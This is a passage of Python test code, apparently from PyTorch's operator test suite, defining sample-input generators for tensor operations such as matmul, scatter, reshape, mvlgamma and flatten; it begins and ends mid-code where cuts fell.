# if elements.numel() < 10 * pow(test_elements.numel(), 0.145): yield SampleInput(make_arg((L,)), args=(make_arg((S,)),)) # else: yield SampleInput(make_arg((S,)), args=(make_arg((L,)),)) def sample_inputs_masked_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, S, device=device) > 0, make_arg((S, S)))) yield SampleInput(make_arg((S, S)), args=(torch.randn((S,), device=device) > 0, make_arg((S, S)))) yield SampleInput(make_arg((S, S)), args=(bernoulli_scalar().to(device), make_arg((S, S)))) yield SampleInput(make_arg((S,)), args=(torch.randn(S, S, device=device) > 0, make_arg((S, S))), broadcasts_input=True) def sample_inputs_masked_fill(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, S, device=device) > 0, 10)) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, S, device=device) > 0, make_arg(()))) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, device=device) > 0, 10)) yield SampleInput(make_arg(()), args=(torch.randn((), device=device) > 0, 10)) yield SampleInput(make_arg(()), args=(torch.randn((), device=device) > 0, make_arg(()))) yield SampleInput(make_arg((S, S)), args=(torch.randn((), device=device) > 0, 10)) yield SampleInput(make_arg((S,)), args=(torch.randn(S, S, device=device) > 0, make_arg(())), broadcasts_input=True) yield SampleInput(make_arg((S,)), args=(torch.randn(S, S, device=device) > 0, 10), broadcasts_input=True) def sample_inputs_masked_select(op_info, device, dtype, requires_grad, **kwargs): samples = ( SampleInput(make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn(M, M, device=device) > 0,)), SampleInput(make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M,), device=device) > 0,)), SampleInput(make_tensor((M,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M, M), device=device) > 0,)), SampleInput(make_tensor((M, 1, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M, M), device=device) > 0,)), SampleInput(make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.tensor(1, device=device, dtype=torch.bool),)), SampleInput(make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.tensor(1, device=device, dtype=torch.bool),)), SampleInput(make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M, M), device=device) > 0,)), ) return samples def sample_inputs_matrix_exp(op_info, device, dtype, requires_grad, **kwargs): samples = ( SampleInput(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad)), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, requires_grad=requires_grad)), ) return samples def sample_inputs_matmul(op_info, device, dtype, requires_grad, **kwargs): test_cases = (((L,), (L,)), ((S, M), (M,)), ((M,), (M, S)), ((S, M), (M, S)), ((S, 0), (0, M)), ((S, S, M), (M,)), ((S, S, M), (M, S)), ((S, S, 0), (0, S)), ((M,), (S, M, S)), ((S, M), (S, M, S)), ((0, 0), (S, 0, 0)), ((S, S, M, M), (S, S, M, S)), ((S, S, M, M), (M,)), 
((M,), (S, S, M, S))) sample_inputs = [] for lhs_shape, rhs_shape in test_cases: lhs = make_tensor(lhs_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) rhs = make_tensor(rhs_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) if op_info.name == 'matmul': sample_inputs.append(SampleInput(lhs, args=(rhs,))) elif op_info.name == '__rmatmul__': sample_inputs.append(SampleInput(rhs, args=(lhs,))) else: raise RuntimeError("`op_info.name` must be 'matmul' or '__rmatmul__'") return tuple(sample_inputs) def sample_inputs_meshgrid(op_info: OpInfo, device: torch.device, dtype: torch.dtype, requires_grad: bool, *, variant: str, **kwargs) -> List[SampleInput]: if variant == 'variadic': def make_inputs( tensors: List[torch.Tensor]) -> Tuple[Union[torch.Tensor, List[torch.Tensor]], Tuple[torch.Tensor, ...]]: return tensors[0], tuple(tensors[1:]) elif variant == 'list': def make_inputs( tensors: List[torch.Tensor]) -> Tuple[Union[torch.Tensor, List[torch.Tensor]], Tuple[torch.Tensor, ...]]: return tensors, () else: raise ValueError( 'Unsupported variant, must be one of {"variadic", "list"}. ' f'Got "{variant}".') SCALAR = torch.Size([]) VECTOR = torch.Size([3]) test_cases: List[List[torch.Size]] = [ [SCALAR], [VECTOR], [VECTOR, SCALAR], [VECTOR, SCALAR, VECTOR], [VECTOR, SCALAR, VECTOR, SCALAR], ] sample_inputs = [] for shapes, indexing in itertools.product(test_cases, {'xy', 'ij'}): input, args = make_inputs( [make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad) for shape in shapes]) sample_inputs.append(SampleInput(input=input, args=args, kwargs=dict(indexing=indexing))) return sample_inputs def sample_inputs_polygamma(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) tensor_shapes = ((S, S), ()) ns = (1, 2, 3, 4, 5) for shape, n in product(tensor_shapes, ns): yield SampleInput(make_arg(shape), args=(n,)) def sample_inputs_mvlgamma(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) tensor_shapes = ((S, S), ()) ns = (1, 2, 3, 4, 5) # Since the accepted lower bound for input # to mvlgamma depends on `p` argument, # the following function computes the lower bound # which we pass to `make_tensor`. def compute_min_val(p): return (p - 1.) / 2 for shape, n in product(tensor_shapes, ns): min_val = compute_min_val(n) if not dtype.is_floating_point: # Round-up minimum value for integral dtypes min_val += 1 else: min_val += 2 * torch.finfo(dtype).eps yield SampleInput(make_arg(shape, low=min_val), args=(n,)) # Since `mvlgamma` has multiple entries, # there are multiple common skips for the additional # entries. Following function is a helper to that end. def skips_mvlgamma(skip_redundant=False): skips = ( # outside domain values are hard error for mvlgamma op. DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_float_domains'), ) if skip_redundant: # Redundant tests skips = skips + ( # type: ignore[assignment] DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), ) return skips # To test reference numerics against multiple values of argument `p`, # we make multiple OpInfo entries with each entry corresponding to different value of p. # We run the op tests from test_ops.py only for `p=1` to avoid redundancy in testing. 
# Class `MvlGammaInfo` already contains the basic information related to the operator,
# it only takes arguments like `domain`, `skips` and `sample_kwargs`, which
# differ between the entries.
class MvlGammaInfo(UnaryUfuncInfo):
    def __init__(self, variant_test_name, domain, skips, sample_kwargs):
        super(MvlGammaInfo, self).__init__(
            'mvlgamma',
            ref=reference_mvlgamma if TEST_SCIPY else _NOTHING,
            aliases=('special.multigammaln',),
            variant_test_name=variant_test_name,
            domain=domain,
            decorators=(precisionOverride({torch.float16: 5e-2}),),
            dtypes=all_types_and(torch.bfloat16),
            dtypesIfCUDA=all_types_and(torch.half),
            sample_inputs_func=sample_inputs_mvlgamma,
            supports_forward_ad=True,
            supports_fwgrad_bwgrad=True,
            skips=skips,
            sample_kwargs=sample_kwargs)


def sample_inputs_entr(op_info, device, dtype, requires_grad, **kwargs):
    low, _ = op_info.domain

    if requires_grad:
        low = 0 + op_info._domain_eps

    return (SampleInput(make_tensor((L,), dtype=dtype, device=device,
                                    low=low,
                                    requires_grad=requires_grad)),
            SampleInput(make_tensor((), dtype=dtype, device=device,
                                    low=low,
                                    requires_grad=requires_grad)))


# TODO: Consolidate `i0e` with sample_inputs_unary when `make_tensor`,
#       supports `exclude` argument.
#       For more context: https://github.com/pytorch/pytorch/pull/56352#discussion_r633277617
def sample_inputs_i0_i1(op_info, device, dtype, requires_grad, **kwargs):

    samples = (SampleInput(make_tensor((S,), dtype=dtype, device=device,
                                       requires_grad=requires_grad)),
               SampleInput(make_tensor((), dtype=dtype, device=device,
                                       requires_grad=requires_grad)))

    if requires_grad and op_info.op == torch.special.i0e:
        # NOTE: `i0e`'s first-order gradient is not continuous
        # at `0`, hence we don't test `i0e` with any input being `0`.
        # TODO: Remove this when `make_tensor` supports excluding `0`.
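        # (Roughly, d/dx i0e(x) = i1e(x) - sgn(x) * i0e(x), which jumps from
        # +1 to -1 across x = 0; a sketch of why 0 must be excluded here.)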
for sample in samples: t = sample.input t[t == 0] = torch.finfo(dtype).eps # type: ignore[index] elif requires_grad and op_info.op != torch.special.i0e: # Special Case for gradient # Sample with `0` in the input t = make_tensor((S,), dtype=dtype, device=device, requires_grad=requires_grad) t[0] = 0 samples += (SampleInput(t),) # type: ignore[assignment] return samples def sample_inputs_cumulative_ops(op_info, device, dtype, requires_grad, supports_dtype_kwargs=True, **kwargs): def _make_tensor_helper(shape, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) samples = [ SampleInput(_make_tensor_helper((S, S, S)), args=(0,)), SampleInput(_make_tensor_helper((S, S, S)), args=(1,)), SampleInput(_make_tensor_helper(()), args=(0,)), ] if supports_dtype_kwargs: # NOTE: if `dtype` is not same as input, then inplace variants fail with # `provided dtype must match the dtype of self tensor in cumsum` samples.append(SampleInput(_make_tensor_helper((S, S, S)), args=(1,), kwargs={'dtype': dtype})) return samples def sample_inputs_unfold(op_info, device, dtype, requires_grad, **kwargs): test_cases = ( ((), (0, 1, 1)), ((S, S, S, S), (0, 3, 1)), ((S, S, S, S), (1, 3, 1)), ((S, S, S, S), (2, 3, 1)), ((S, S, S, S), (3, 3, 1)), ((S, S, S, S), (0, 3, 2)), ((S, S, S, S), (1, 3, 2)), ((S, S, S, S), (2, 3, 2)), ((S, S, S, S), (3, 3, 2)), ((S, S, S, S), (0, 4, 1)), ((S, S, S, S), (1, 4, 1)), ((S, S, S, S), (2, 4, 1)), ((S, S, S, S), (3, 4, 1)), ((M,), (0, 3, 1)), ((M,), (0, 3, 2)), ((M,), (0, 3, 3)), ((1000,), (0, 3, 11)), ((1000,), (0, 2, 27)), ((10, 10), (0, 1, 2)), ((10, 10), (1, 2, 3)), ((10, 10), (1, 2, 2)), ((S, S, S), (2, 3, 2)), ) sample_inputs = [] for shape, arguments in test_cases: sample_inputs += [SampleInput(make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=arguments)] return sample_inputs def sample_inputs_split(op_info, device, dtype, requires_grad, *, list_args=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) if list_args: cases = ( ((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)],)), ((S, S, S), ([int(S / 2), S - int(S / 2) * 2, int(S / 2)], 2),), ((S, S, S), ([int(S / 2), S - int(S / 2) * 2, int(S / 2)], -2),) ) else: cases = ( # type: ignore[assignment] ((S, S, S), (2,)), ((S, S, S), (S, 1)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_split_with_sizes(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = (((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)],)), ((S, S, S), ([int(S / 3), S - int(S / 3), 0],)), ((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)], 2)), ((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)], -2)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_msort(op_info, device, dtype, requires_grad, **kwargs): def apply_grad(t): if dtype in floating_types_and(torch.float16, torch.bfloat16): t.requires_grad_(requires_grad) def large_1d_unique(dtype, device): res = torch.randperm(L * L * L, dtype=torch.int64, device=device) res = res.to(dtype) apply_grad(res) return res samples = [] # Test case for large tensor. 
largesample = SampleInput(large_1d_unique(dtype, device)) sample = SampleInput(make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)) return [largesample, sample] def sample_inputs_lerp(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) samples = ( # no broadcast SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 0.4)), # broadcast rhs SampleInput(make_arg((S, S)), args=(make_arg((S,)), 0.4)), # scalar tensor SampleInput(make_arg(()), args=(make_arg(()), 0.4)), # broadcast rhs scalar-tensor SampleInput(make_arg((S, S)), args=(make_arg(()), 0.4)), # broadcast rhs with weight tensor SampleInput(make_arg((S, S)), args=(make_arg((S,)), make_arg((S, S)))), # broadcast rhs and weight tensor SampleInput(make_arg((S, S)), args=(make_arg((S, 1)), make_arg((S,)))), # broadcast lhs SampleInput(make_arg((S,)), args=(make_arg((S, S)), 0.4), broadcasts_input=True), # scalar broadcast_lhs SampleInput(make_arg(()), args=(make_arg((S, S)), 0.4), broadcasts_input=True), # broadcast all SampleInput(make_arg((S, 1)), args=(make_arg((S, S)), 0.4), broadcasts_input=True), # tensor broadcast all SampleInput(make_arg((S, 1)), args=(make_arg((S, S)), make_arg((S, 1))), broadcasts_input=True), # no broadcast with weight tensor SampleInput(make_arg((S, S)), args=(make_arg((S, S)), make_arg((S, S)))), # broadcast lhs with weight tensor SampleInput(make_arg((S,)), args=(make_arg((S, S)), make_arg((S, S))), broadcasts_input=True), # broadcast lhs and weight tensor SampleInput(make_arg((S,)), args=(make_arg((S, S, S)), make_arg((S, S))), broadcasts_input=True), # broadcast lhs and weight tensor variant SampleInput(make_arg((S, S)), args=(make_arg((S, S, S)), make_arg((S,))), broadcasts_input=True), ) if dtype.is_complex: samples = samples + ( # type: ignore[assignment] # no broadcast SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 0.4j)), SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 1.2 + 0.1j)), # broadcast rhs SampleInput(make_arg((S, S)), args=(make_arg((S,)), 0.4j)), SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 5.4 + 9j)), # scalar tensor SampleInput(make_arg(()), args=(make_arg(()), 0.4j)), SampleInput(make_arg(()), args=(make_arg(()), 6.1 + 0.004j)), # broadcast rhs scalar-tensor SampleInput(make_arg((S, S)), args=(make_arg(()), 0.4j)), SampleInput(make_arg((S, S)), args=(make_arg(()), 1 + 2j)), ) return samples def sample_inputs_tensordot(self, device, dtype, requires_grad, **kwargs): cases = ( ((2, 2, 2), (2, 2, 2), (2)), ((2, 2, 1), (2, 1, 2), ([0, 1], [2, 0])), ) samples = [] for first_shape, second_shape, dims in cases: samples.append(SampleInput(make_tensor(first_shape, dtype=dtype, device=device, requires_grad=requires_grad), args=(make_tensor(second_shape, dtype=dtype, device=device, requires_grad=requires_grad),), kwargs=dict(dims=dims,))) return tuple(samples) def sample_inputs_kron(op_info, device, dtype, requires_grad, **kwargs): test_cases = ( ((S, S), (M, L)), ) sample_inputs = [] for input_shape, other_shape in test_cases: input = make_tensor(input_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) other = make_tensor(other_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) sample = SampleInput(input, args=(other,)) sample_inputs.append(sample) return tuple(sample_inputs) def sample_inputs_inner(self, device, dtype, requires_grad, **kwargs): return ( SampleInput( 
make_tensor((S, ), dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, requires_grad=requires_grad), ) ), SampleInput( make_tensor((), dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), ) ), ) def sample_inputs_scatter(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) def _gather(shape, index_dim, max_indices): return gather_variable(shape, index_dim, max_indices, device=device) zero = torch.tensor(0, dtype=torch.long, device=device) test_cases = ( (_tensor((M, S)), (0, _gather((S, S), 1, M), _tensor((S, S)))), (_tensor((M, S)), (1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (-1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (0, _gather((M, S // 2), 1, M), _tensor((M, S // 2)))), (_tensor((M, S)), (1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor((M, S)), (-1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor(()), (0, zero.clone().detach(), _tensor(()))), (_tensor(()), (0, zero.clone().detach(), 2.5)), ) samples = [] for tensor, args in test_cases: samples.append(SampleInput(tensor, args=args)) if not requires_grad: samples.append(SampleInput( tensor.clone().detach(), args=args, kwargs={'reduce': 'add'} )) if dtype.is_floating_point: samples.append(SampleInput( tensor.clone().detach(), args=args, kwargs={'reduce': 'multiply'} )) return samples def sample_inputs_scatter_add(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) def _gather(shape, index_dim, max_indices): return gather_variable(shape, index_dim, max_indices, device=device) zero = torch.tensor(0, dtype=torch.long, device=device) test_cases = ( (_tensor((M, S)), (0, _gather((S, S), 1, M), _tensor((S, S)))), (_tensor((M, S)), (1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (-1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (0, _gather((M, S // 2), 1, M), _tensor((M, S // 2)))), (_tensor((M, S)), (1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor((M, S)), (-1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor(()), (0, zero.clone().detach(), _tensor(()))), ) return [SampleInput(tensor, args=args) for tensor, args in test_cases] def sample_inputs_scatter_reduce(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) def _gather(shape, index_dim, max_indices): return gather_variable(shape, index_dim, max_indices, device=device) zero = torch.tensor(0, dtype=torch.long, device=device) test_cases = ( ((M, S), 0, _gather((S, S), 1, M), (S, S)), ((M, S), 1, _gather((S, S), 0, S), (S, S)), ((M, S), -1, _gather((S, S), 0, S), (S, S)), ((M, S), 0, _gather((M, S // 2), 1, M), (M, S // 2)), ((M, S), 1, _gather((M, S // 2), 0, S), (M, S // 2)), ((M, S), -1, _gather((M, S // 2), 0, S), (M, S // 2)), ((), 0, zero.clone().detach(), ()), ) reduce = op_info.variant_test_name for args, include_self in product(test_cases, [True, False]): inp_shape, dim, index, src_shape = args yield SampleInput(_tensor(inp_shape), args=(dim, index, 
_tensor(src_shape), reduce),
                          kwargs={'include_self': include_self})

    # Sample inputs to test edge cases for backward
    # Check that gradients are propagated correctly for prod when zeros in self/src are reduced
    if requires_grad and reduce == 'prod':
        # This sample tests gradients for the following cases
        # (a) 1 zero reduced (from src (self[0, 1], self[1, 1]), from self (self[0, 0], self[2, 0]))
        # (b) 2 zeros reduced (1 from src and 1 from self (self[1, 0]))
        # (c) no zeros reduced (self([2, 1]))
        # (d) 2 zeros reduced (both from src) is tested in test/test_autograd.py
        #     test_scatter_index_reduce_prod_gradgrad_error as this case is not supported for gradgrad
        input = torch.tensor([[0, 13], [0, 17], [0, 19]], dtype=dtype, device=device, requires_grad=requires_grad)
        src = torch.tensor([[0, 1, 2, 3], [0, 4, 0, 1], [2, 3, 5, 6]], dtype=dtype, device=device, requires_grad=requires_grad)
        idx = torch.tensor([[1, 1, 0, 0], [0, 0, 1, 1], [0, 0, 0, 1]], dtype=torch.long, device=device)

        yield SampleInput(input,
                          args=(1, idx, src, reduce),
                          kwargs={'include_self': True})


def sample_inputs_ravel(op_info, device, dtype, requires_grad, **kwargs):
    samples = (SampleInput(make_tensor((S, S, S), dtype=dtype, device=device,
                                       low=None, high=None,
                                       requires_grad=requires_grad)),
               SampleInput(make_tensor((), dtype=dtype, device=device,
                                       low=None, high=None,
                                       requires_grad=requires_grad)),)

    return samples


def sample_inputs_tril_triu(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)
    cases = (((M, M), ()),
             ((M, M), (2,),),
             ((S, M, M), ()),
             ((S, M, M), (2,)),
             ((3, 3, S, S), ()),)

    for shape, args in cases:
        yield SampleInput(make_arg(shape), args=args)


def sample_inputs_clone(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    yield SampleInput(make_arg((S, M, S)))
    yield SampleInput(make_arg(()))


def reference_inputs_clone(op, device, dtype, requires_grad, **kwargs):
    yield from sample_inputs_clone(op, device, dtype, requires_grad, **kwargs)

    shapes = (
        (3, 5, 6),
        (1, 1, 3, 5, 6),
        (1, 1, 3, 5, 6, 1, 1),
        (1, 0, 3, 5, 0, 2),
        (1, 0, 3, 5, 0, 0, 1, 1, 2),
        (),
    )

    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)
    for shape in shapes:
        yield SampleInput(make_arg(shape))
        yield SampleInput(make_arg(shape).transpose(0, -1))
        yield SampleInput(make_arg(shape, noncontiguous=True))
        yield SampleInput(make_arg(shape, noncontiguous=True).transpose(0, -1))

    # shape, strides, offset
    strided_cases = (
        ((5, 6, 2), (1, 1, 7), 2),
        ((5, 5, 4), (1, 1, 7), 2),
        ((5, 5, 2), (4, 5, 7), 3),
        ((5, 5, 2), (5, 5, 7), 3),
        ((5, 5, 2), (5, 5, 5), 3),
        ((9, 5, 2), (0, 1, 7), 3),
    )

    for shape, strides, offset in strided_cases:
        yield SampleInput(make_arg(500,).as_strided(shape, strides, offset))


def sample_inputs_contiguous(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)
    yield SampleInput(make_arg((S, S)))


def sample_inputs_sum_to_size(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    # list of tuples (shape, shape) defining the shapes of the input and output tensors
    sample_shapes = [
        ((), ()),
        ((S), (1)),
        ((S, S), (1, 1)),
        ((S, S), (1, S)),
        ((S, S), (S, S)),
        ((S, S, S), (S, 1, S)),
    ]

    samples = []

    for input_shape, output_shape in sample_shapes:
        input_t = make_arg(input_shape)
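        # sum_to_size collapses broadcast dimensions by summing, e.g.
        # (illustrative):
        #   >>> torch.ones(2, 3).sum_to_size(1, 3)
        #   tensor([[2., 2., 2.]])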
samples.append(SampleInput(input_t, args=(output_shape,))) return samples def sample_inputs_resize_ops(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device) cases = (((S, S, S), (S * S, S)), ((), ()), ((), (1, 1, 1)), ) for shape, args_or_shape in cases: # Update `args` based on operator if op_info.name == 'resize_': # resize_ takes shape/tuple of ints, args = (args_or_shape, ) elif op_info.name == 'resize_as_': # resize_as_ takes another tensor args = (make_arg(shape, requires_grad=False), ) # type:ignore[assignment] else: raise ValueError("sample_inputs_resize_ops is being used with incorrect operator") yield(SampleInput(make_arg(shape, requires_grad=requires_grad), args=args)) def sample_inputs_view_reshape(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = ( ((S, S, S), (S * S, S)), ((S * S, S), (S, S, S)), ((S * S, S), (S, -1, S)), ((S * S * 2, S), (S, -1)), ((S,), (S,)), ((), ()), ((), (1,)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=(args,)) if kwargs.get("transpose_samples", False) and len(shape) >= 2: transposed = make_arg(shape).transpose(0, 1).detach().requires_grad_(requires_grad) yield SampleInput(transposed, args=(args,)) def reference_inputs_view_reshape(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_view_reshape(op, device, dtype, requires_grad, **kwargs) cases = ( ((125,), (25, 5)), ((25, 25), (1, 5, 5, 1, 5, 1, 5, 1)), ((16, 32), (2, 4, 1, 4, 4, 1, 4)), ((16, 12), (12, 16)), ((1, 16, 12), (12, 16)), ((1, 5, 1, 5), (25, 1)), ((2, 4, 2), (4, 4)), ((1, 4), (1, 1, 2, 1, 2)), ((3, 5, 7), (7, 5, 3)), ((1,), ()), ((5, 0, 2, 3), (5, 0, 2, 3)), ((2, 1, 0, 3, 1), (5, 0)), ((1,), ()), ((4, 5, 6), (4, 5, 6, 1, 1, 1)), ((), (1, 1, 1, 1)), ) irreversible_cases = ( ((), (-1,)), ((4, 7, 9, 1, 1), (1, 4, 3, -1, 1)), ) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for a, b in cases: yield SampleInput(make_arg(a), args=(b,)) yield SampleInput(make_arg(b), args=(a,)) if kwargs.get("transpose_samples", False): yield SampleInput(make_arg(a, noncontiguous=True).transpose(0, -1), args=(b,)) else: yield SampleInput(make_arg(a, noncontiguous=True), args=(b,)) for a, b in irreversible_cases: yield SampleInput(make_arg(a), args=(b,)) def error_inputs_reshape(op, device, **kwargs): cases = ( # Reshape to different numel ((2,), ()), ((1, 3, 0), ()), ((4, 3), (4, 2)), ((1, 3, 5), (5, 2, 2)), # No valid inference ((1, 3, 5), (5, -1, 2)), # Two inferred shapes ((1, 3, 5), (5, -1, -1)), ((1), (0, -1)), ((0, 5), (0, -1)), ) make_arg = partial(make_tensor, dtype=torch.float32, device=device, requires_grad=False) for a, b in cases: yield ErrorInput(SampleInput(make_arg(a), args=(b,)), error_type=Exception, error_regex="") def sample_inputs_view_as_reshape_as(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device) cases = (((S, S, S), (S * S, S)), ((), ()), ((), (1, 1)), ) for case in cases: shape, shape_other = case inp = make_arg(shape, requires_grad=requires_grad) yield(SampleInput(inp, args=(make_arg(shape_other, requires_grad=False),))) if op_info.name != "view_as" and len(shape) >= 2: yield(SampleInput( inp.clone().transpose(0, 1).requires_grad_(requires_grad), args=(make_arg(shape_other, requires_grad=False),))) def sample_inputs_atleast1d2d3d(op_info, device, dtype, requires_grad, **kwargs): input_list = [] 
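    # atleast_1d/2d/3d accept either a single tensor or a sequence of tensors,
    # so both a per-shape sample and one list-of-tensors sample are built below.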
shapes = ((S, S, S, S), (S, S, S), (S, S), (S, ), (),) make_tensor_partial = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) samples = [] for shape in shapes: input_list.append(make_tensor_partial(shape)) samples.append(SampleInput(make_tensor_partial(shape))) samples.append(SampleInput(input_list, )) return samples def sample_inputs_column_stack(op_info, device, dtype, requires_grad, **kwargs): input_list = [] cases: Tuple[tuple, tuple] = ( # type: ignore[assignment] ((S, 2, 1), (S, 3, 1)), ((S), (S, 5)), ((), (1, S)) ) make_tensor_partial = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape1, shape2 in cases: input_list.append(SampleInput([make_tensor_partial(shape1), make_tensor_partial(shape2)])) return input_list def sample_inputs_flatten(op_info, device, dtype, requires_grad, **kwargs): samples = [] shapes = ((S, S, S), (S, S), (S, ), (),) make_tensor_partial = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape in shapes: samples.append(SampleInput(make_tensor_partial(shape))) if len(shape) > 1: samples.append(SampleInput(make_tensor_partial(shape), kwargs=dict(start_dim=1, end_dim=-1))) return samples def reference_inputs_flatten(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_flatten(op, device, dtype, requires_grad, **kwargs) # shape x start_dim x end_dim cases = ( ((5, 4, 0, 1, 3, 7), 1, 3), ((5, 4, 0, 1, 3, 7), 4, 5), ((5, 4, 1, 1, 3, 7), 2, 3), ((), 0, -1), ((1,), 0, -1), ((3, 7, 5), 1, 2), ((4, 5), 1, 1), ((1, 5, 5, 1, 5, 1, 5, 1), 0, 2), ((1, 5, 5, 1, 5, 1, 5, 1), 3, -1), ((1, 5, 5, 1, 5, 7, 5, 1), -2, -1), ((2, 4, 2), 0, 1), ((4, 2, 2), 1, 2), ((0, 3, 4, 5), 1, 3), ) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape, start, end in cases: yield SampleInput(make_arg(shape), args=(start, end,)) yield SampleInput(make_arg(shape, noncontiguous=True).transpose(0, -1), args=(start, end,)) yield SampleInput(make_arg(shape).transpose(0, -1), args=(start, end,)) def sample_inputs_select(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), (1, 2)), ((S, S, S), (-1, 2)), ((S, S, S), (-1, -1)), ((S, S, S), (1, -1)), ((S,), (0, 2)) ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_select_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), (S, S), (1, 2)), ((S, S, S), (S, S), (-1, 2)), ((S, S, S), (S, S), (-1, -1)), ((S, S, S), (S, S), (1, -1)), ((S,), (), (0, 2)) ) for input_shape, src_shape, args in cases: input_ = make_arg(input_shape) src = make_arg(src_shape) yield SampleInput(input_, args=(src, *args)) def sample_inputs_slice_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((L, L, L), (L, L, L,), (0, 0, L, 1)), ((L, L, L), (L // 2, L, L,), (0, L // 2, L, 1)), ((L, L, L), (L // 4, L, L,), (0, L 